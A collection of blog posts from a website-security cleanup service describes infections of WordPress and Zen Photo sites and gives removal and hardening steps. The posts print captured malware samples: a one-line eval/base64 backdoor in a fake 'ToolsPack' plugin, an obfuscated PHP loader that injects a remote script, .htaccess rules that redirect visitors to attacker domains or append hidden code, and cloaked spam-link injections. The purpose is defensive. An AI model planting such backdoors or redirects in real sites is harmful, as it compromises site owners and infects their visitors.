“you need to pay for this crypt” infection

We’ve been seeing a lot of this lately, infected websites that have the wording,

you need to pay for this crypt

over and over a few times across the top of the webpages.

This is usually accompanied by some script tags that try to infect the visitor with the Blackhole Kit. (The Blackhole Kit is an exploit used by hackers to try and infect the visitor’s browser with a variety of viruses, trojans and other malware)

On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.

You can begin by removing the malscript immediately preceeding this text. You can look in the wp-content/index.php which is normally about 30 bytes. With anything malicious in there it will be much larger in file size.

Then, make certain that your WordPress is updated and all plugins too.

We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.

Why?

Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”

People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.

Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.

Take for instance the movie Oceans 11. That can be converted into:

0c3@n$_elEv3N_+h3_MoV1E

Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?

If you need help cleaning up from an infection, please email me at traef@wewatchyourwebsite.com.

Thank you.

Proper use and configuration of timthumb.php

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest:
http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and inside you’ll this line to verify you have the correct version:

define (‘VERSION’, ’2.8.9′);

Scroll down a few lines and you’ll:

if(! defined(‘ALLOW_EXTERNAL’) ) define (‘ALLOW_EXTERNAL’, TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALL_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOW_SITES.

If you at the next line down in this file you’ll see:

if(! defined(‘ALLOW_ALL_EXTERNAL_SITES’) ) define (‘ALLOW_ALL_EXTERNAL_SITES’, false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
$ALLOWED_SITES = array (
'flickr.com',
'staticflickr.com',
'picasa.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
'imgur.com',
'imageshack.us',
'tinypic.com',
'yourdomainhere',
);
}

Now in the line where we have: ‘yourdomainhere’ you would replace that with your website domain. For us, it would be ‘wewatchyourwebsite.com’. A few things to note here. If you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.

What we’ve done is to allow timthumb.php to show files that are stored on your website and the locations above that. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.

What is the ToolsPack plugin?

Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.

This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php

Inside that file looks like this:

/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.

Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.

How did we find this?

Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.

Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.

Further analysis of the datetime stamp on ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers and everyone of them with the ToolsPack plugin had a virus or trojan on them. This included Apple’s Mac.

Yes, the hackers are infected computers, both PCs and Macs with password stealing trojans. These password stealing trojans are stealing all passwords.

We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course. :)

Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.

Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.

We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.

If you assistance in recovering from this infection, please contact me directly at: traef@wewatchyourwebsite.com or by phone at: (847)728-0214.

Thank you.

l_backuptoster.php still showing

Over the past few weeks we’ve cleaned a number of websites that were infected with l_backuptoster.php and while it’s been around awhile, we thought we would share our experience. This infection isn’t so much about website security as it is about computer security, but it does eventually affect your website security as well – which is why we’re involved.

For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.

In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The files is uploaded with 2 other files: body1.txt and body.txt, used, then deleted until the next time the hacker wants to send SPAM.

Here is what you might see in your FTP logs:

Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c

The xx.xx.xx.xxx would actually be where this traffic is originating. The number after is the file size, the path and the FTP account used.

You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.

If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:

xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-”
xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-”

Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.

In the above log file entries the ipAddr matches the first IP address and the serv_name parameter would be your, or the infected URL.

You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.

What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.

If this is true, then the hackers are no longer just stealing the FTP login credentials, but their keyboard loggers are also recording all logins and the hackers are very interested in infecting websites so why not create their own FTP account.

As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.

Without constant watching of the log files, we would not have seen this.

If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:

  • Change your hosting account password
  • Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
  • Create new passwords for remaining FTP accounts
  • Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
  • Check your log files on regular basis. Download them to your computer and search for ‘l_backuptoster.php’

One point to remember, do not ever have your browser save your hosting account password or the any passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser saved passwords!

If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.

Thank you.

If you found this useful, Tweet about us, like us on Facebook or follow us on Google+.

Attack of the BrowserDetect

This infection has been around for awhile, but it’s been more popular recently.

We’ve been seeing it after the closing html tag in index.html files:

Here’s the code:

(opening script tag) var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent)...');}else {}(closing script tag)

There have been other domains in place of allegianstaffing.com too, but the bottom line is that the above script performs a series of browser checks then creates an iframe.

This infection has been seen in Zen Cart, osCommerce, WordPress and Prestashop websites by us, but I’m certain that it’s just the infection used at the moment.

If you’ve experienced this infection and need assistance with it, please call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

If you have any comments to add to this, please leave a comment below.

Thank you.

gogele analytics infection

We’re seeing some websites infected with code that starts with:

gogele analytics start

It then continues with:

(opening script tag)try{document.asd.removeChild({})}catch(q){ss=”";s=String;}ddd=new Date();…eval(ss);(closing script tag)

and ends with:

gogele analytics end

We’ve been seeing this in index.html files usually immediately following the opening body tag ().

So far, no other common factors in the sites we’ve cleaned this from.

If you have any further information you’d like to share, please post a comment. If we find more information we’ll be sharing it here.

If you know of someone who could benefit from this information, please share it, Tweet it, post it on your Facebook or LinkedIn pages.

If you need help cleaning this, you can call us at (847)728-0214 or email directly at: traef@wewatchyourwebsite.com

Thank you.

New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET["l"]; } @header(“Location: $l”); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.

Zen Photo exploited to infect websites

Over the past week we’ve been seeing many photographer’s websites infected through an exploit in Zen Photo. Actually it’s not Zen Photo, but the ajaxfilemanager.php file used in the tiny_mce plugin.

Check your websites for the file: ajaxfilemanger.php and rename it or delete it.

In Zen Photo based websites the above file can be found in:

zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager

The file is accessible from a browser which allows anyone to upload files to your website. Quite often we see files on websites with a .jpg or .png extension, which are normally graphic files, but the files we’re concerned with are actually PHP files. The hackers have many ways of renaming these to .php extensions and then they run them and infect the website.

If your website is hosted on a Linux server, you can use a .htaccess file to protect this file with something like:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /ajaxfilemanager/.*$ [NC]
RewriteCond %{REQUEST_FILENAME} ^.+\.php$
RewriteRule .* – [F,NS,L]

Which will prevent remote access to all .php files in the ajaxfilemanager folder.

Depending on what version of Zen Photo, we have seen some config.php files with a line:

define(‘CONFIG_QUERY_STRING_ENABLE’, true);

Which appears to allow you send a string that would tell ajaxfilemanager what configuration file to use. This should be set to false.

You can either rename the ajaxfilemanager folder, delete it, use an .htaccess file or make certain your plugins are updated but you have to do something to protect your website.

The most common file we’ve seen in websites infected through this method is:

/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php

And it usually has this code:

(opening php tag followed by a long string of blank spaces)$vf=substr(1,1);foreach(array(10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0])…unset($vf);unset($vj);(closing php tag)

It is our understanding that the file name is very similar to legitimate files in the same folder.

We’ve been seeing many other backdoors uploaded with this same exploit so you really should have it examined carefully.

Please leave a comment if you found this interesting, if you have more questions about this or have additional information regarding this infection.

As always, if you need help cleaning this up, call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

Thank you.

WordPress websites infected through outdated contact-form-7 plugin

Don’t go blaming the author of the WordPress plugin contact-form-7, but 1,022 of the websites we’ve cleaned in the past 11 days have old versions of the contact-form-7 plugin.

If you have a WordPress based website and you’re finding code like this in your index.php files:

(opening php tag) @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZl..."\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} (closing php tag)

then you probably have an outdated contact-form-7 plugin.

We're not seeing the usual evidence in the log files, so we believe that the infection is a string that is being piped to /dev/null - at least that's our theory.

In your wp-content folder under: /plugins/contact-form-7 open your wp-contact-form-7.php file and look at line 8:

/*
Plugin Name: Contact Form 7
Plugin URI: http://contactform7.com/
Description: Just another contact form plugin. Simple but flexible.
Author: Takayuki Miyoshi
Author URI: http://ideasilo.wordpress.com/
Version: 2.4.4
*/

That will tell you what version you have. Or just edit your index.php file in the root of your site. If you have the code listed at the top of the post, then you probably have an outdated version of contact-form-7 also.

I would like to thank Takayuki Miyoshi for assisting us with finding this. Again, don't blame the author, everyone should be updating their plugins on a regular basis.

Your contact-form-7 version should be 3.0.1 which was released on November 3, 2011 and can be obtained here:

On some infected websites you'll also see a "j" and/or a "js" folder in the plugins folder. These need to be removed as they are part of the infection, but not in all cases.

As always you need to scan your files for any backdoors. We've seen some of these infected sites with backdoors and some without with this website infection. This leads me to believe that the hackers feel it's flying under the radar enough that they don't need a backdoor.

If you need help cleaning this off your sites, call me at (847)728-0214 or email me at: traef@wewatchyourwebsite.com

Spam links in WordPress infected websites

We’ve been seeing a lot of spam links in WordPress index.php files. Even the “silence is golden” 30 byte index.php files sprinkled throughout a WordPress installation have been infected.

These infected websites had other malicious code as well, but the index.php files had variations of the following code:

<!– /harew–>

<?

$agent = $_SERVER['HTTP_USER_AGENT'];

if(!eregi(“google”,$agent))

{

?>

<div style=”position:absolute; top:-99999px;”>

<?

}

?>

bedava <a href=”http://sikisizleriz.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://bedavapornocu.blogspot.com/”>porno</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://http://grupsikisizle.blogspot.com/”>sex</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://fulllezizle.blogspot.com/”>lezbiyen</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://sikisizlex.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

free <a href=”http://freefullsex.blogspot.com/”>sex</a> videos

free <a href=”http://freesexfull.tumblr.com/”>sex</a> videos

</div>

Currently we see about 12,000+ websites infected with this code. These sites are usually infected with a variety of .htaccess file infections as well, so just removing this code will not clean your website.

For instance, many of them have this in their .htaccess files:

php_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db

This will add (append) whatever is in the Thumbs.db file to files when the page is rendered. This will show the infectious code in Thumbs.db after running the PHP code in Thumbs.db, when you view source on an infected web page, but when you look in the raw code of the index file, the code won’t be there.

This line is usually preceeded by many, many blank lines in an attempt to hide it. Inside the Thumbs.db file is code like:

<?php
@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7kSK…;$eva1tYlbakBcVSir = “\x67\141\x6f\133\x70\170\x65″;$eva1tYldakBoVS1r = “\x65\143\x72\160″;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Which is the infectious code delivered to any web page rendered from the folder with the above .htaccess file.

There doesn’t appear to be any common characteristic of the websites infected with this, other than the infected websites we’ve cleaned have all been WordPress. They were already at the current version, some have the vulnerable timthumb.php files, some don’t. Some are using FCKeditor in one way or another and we have seen this as a successful attack vector for quite awhile.

If you have this type of infection, please post a comment with any other information you may have regarding this. Mostly, what plugins you have on your site. Maybe then as a community we can zero in on the root cause.

If you found this post useful or informative, please Tweet about us, like us on Facebook, or just post a comment.

As always, if you need help cleaning this from your website, please send me an email: traef@wewatchyourwebsite.com.

Thank you.